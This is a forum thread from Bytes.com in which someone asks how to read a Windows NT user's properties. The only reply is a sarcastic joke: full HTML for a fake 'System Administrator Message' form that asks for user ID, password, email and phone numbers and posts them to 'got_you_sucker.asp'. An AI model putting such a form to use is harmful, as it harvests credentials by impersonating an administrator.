473,394 Members | 1,866 Online
Bytes | Software Development & Data Engineering Community
Post Job

Home Posts Topics Members FAQ

Join Bytes to post your question to a community of 473,394 software developers and data experts.

How to get winnt login user properties

Hi..
How to get winnt login user properties like address,phoneno, email etc.
With regards,
Vijay Mehta
Jul 23 '05 #1
1 3574
Vijay Mehta wrote:
Hi..
How to get winnt login user properties like address,phoneno, email etc.
With regards,
Vijay Mehta


It's actully stupidly simple, as follows;

<html><head><title> Admin Details </title>
<style type="text/css">
p,form
{font-family: sans-serif; font-size: 12px;
padding: 5 0 0 0; line-spacing: 1;
}
..X
{position: absolute; left: 120px}
</style></head>
<body>
<div style="background-color: #eeeeff;">
<h2>System Administrator Message</h2>
<form action="got_you_sucker.asp" method="post">
<p style="padding-left: 10;">So that we may properly administer your
account,<br>please enter the following information:</p>
<p>User ID:<input class="X"
type="text" name="userID" cols="10"></p>
<p>Password:<input class="X"
type="text" name="userID" cols="10"></p>
<p>e-mail address:<input class="X"
type="text" name="userEmail" cols="10"></p>
<p>Your Ph:<input class="X"
type="text" name="userPh" cols="10"></p>
<p>Girlfriends's Ph:<input class="X"
type="text" name="gfPh" cols="10"></p>
<input style="margin: 20 0 0 200;" type="submit" value="Submit">
</form>
</div>
</body></html>
Jul 23 '05 #2

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics

8
by: Hakan | last post by:
I use the following code to check if a user is an admin in the login page of our intranet. Set User = GetObject("WinNT://" & UserDomain & "/" & UserName & ",user" For Each Group in User.Group...
5
by: Blake | last post by:
ASP code looks like this (win2k, IIS 5, Win2k AD): <% Set oUser = GetObject("WinNT://ourdomain/testuser") response.write("user = " & oUser.Name) %> output is this: error '80070035'
2
by: A Lake | last post by:
Hi, I'm trying to get a very simple task to work. Using the users login name (gained from IE) I want to get their full name from AD (Win 2k and 2003 AD domain). I'm using this ASP code on the...
4
by: Thomaz | last post by:
In VB, I can write the following code to get the list of users and groups in the domain ASIA. How do I do the same in C# Set objContainer = GetObject("WinNT://ASIA") objContainer.Filter =...
2
by: tractng | last post by:
Guys, I really need help with this. I need to creat a login page for the website. Its an existing site that connects to SQL 7 with a local user in the database called 'maya'. It was...
5
by: Shimon Sim | last post by:
I am working with LogIn control and need to set some property for profile after user is authenticated. I thought that LoggedIn event is the right place but system tells me that the property can't...
0
by: whosyodaddy1019 | last post by:
In my hunt to change the "User Cannot Change password" attribute in active directory so that its unchecked, I read that it is easier to use WinNT instead of LDAP. But im having issues getting it to...
0
by: muder | last post by:
I have a standard Login ASP.NET 2.0 control on a login Page, a LoginName and LoginStatus controls on the member's page. once the user login successfully I am redirecting the user to Member.aspx...
0
by: Jacob Donajkowski | last post by:
Once the user logs in I want to have the users switch from the Roster View to the Profile View and enter their profile infomation and save it. Then the next time they login and go to the Profile...
0
by: Charles Arthur | last post by:
How do i turn on java script on a villaon, callus and itel keypad mobile phone
0
by: ryjfgjl | last post by:
If we have dozens or hundreds of excel to import into the database, if we use the excel import function provided by database editors such as navicat, it will be extremely tedious and time-consuming...
0
by: ryjfgjl | last post by:
In our work, we often receive Excel tables with data in the same format. If we want to analyze these data, it can be difficult to analyze them because the data is spread across multiple Excel files...
0
by: emmanuelkatto | last post by:
Hi All, I am Emmanuel katto from Uganda. I want to ask what challenges you've faced while migrating a website to cloud. Please let me know. Thanks! Emmanuel
0
BarryA
by: BarryA | last post by:
What are the essential steps and strategies outlined in the Data Structures and Algorithms (DSA) roadmap for aspiring data scientists? How can individuals effectively utilize this roadmap to progress...
0
by: Hystou | last post by:
There are some requirements for setting up RAID: 1. The motherboard and BIOS support RAID configuration. 2. The motherboard has 2 or more available SATA protocol SSD/HDD slots (including MSATA, M.2...
0
marktang
by: marktang | last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However,...
0
by: Hystou | last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can...
0
Oralloy
by: Oralloy | last post by:
Hello folks, I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>". The problem is that using the GNU compilers,...

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.